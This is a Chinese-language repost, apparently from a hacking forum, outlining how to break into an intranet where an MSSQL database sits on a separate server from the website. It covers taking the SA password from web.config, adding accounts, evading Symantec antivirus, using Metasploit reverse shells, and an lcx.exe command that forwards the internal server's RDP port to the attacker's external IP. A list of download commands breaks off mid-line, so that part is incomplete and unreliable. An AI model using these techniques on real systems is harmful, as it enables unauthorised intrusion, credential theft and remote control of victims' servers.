概述
本文转自:http://bbs.blackbap.org/thread-6203-1-2.html
1. 服务器属内网环境,站库分离,通过web.config找到数据库服务库SA帐号密码,成功添加用户(192.168.0.206) 。
2. Web服务器(192.168.0.203) 、数据库服务器(192.168.0.206)都存在symantec杀毒软件,不能转lcx.exe工具转发 。
3. 测试过其它的转发工具,要么被查杀,要么无法用,使用reDuh工具只能转发当前IP的,而且速度极慢,受不了0.0 。
4. 使用msfpayload生成的exe文件也被查杀,由于服务器是x64的,msfencode没有x64的编码器,所以没能反弹成功 。
思路1:关闭杀软,通过以下提供的命令下载文件(未测试)
思路2:使用msf aspx反弹,然后进行转发及跨路由渗透(已成功)
正常思路:如果没有杀软,直接传lcx.exe到192.168.0.203上,然后使用以下命令转发192.168.0.206:
c:lcx.exe -slave 你的外网IP 51 192.168.0.206 3389 // 看了这个后,你们应该都懂的吧 0.0 。
DOS命令:(一条一条执行)
- echo Set Post = CreateObject("
最后
以上就是坦率短靴为你收集整理的MSSQL站库分离情况的渗透思路的全部内容,希望文章能够帮你解决MSSQL站库分离情况的渗透思路所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复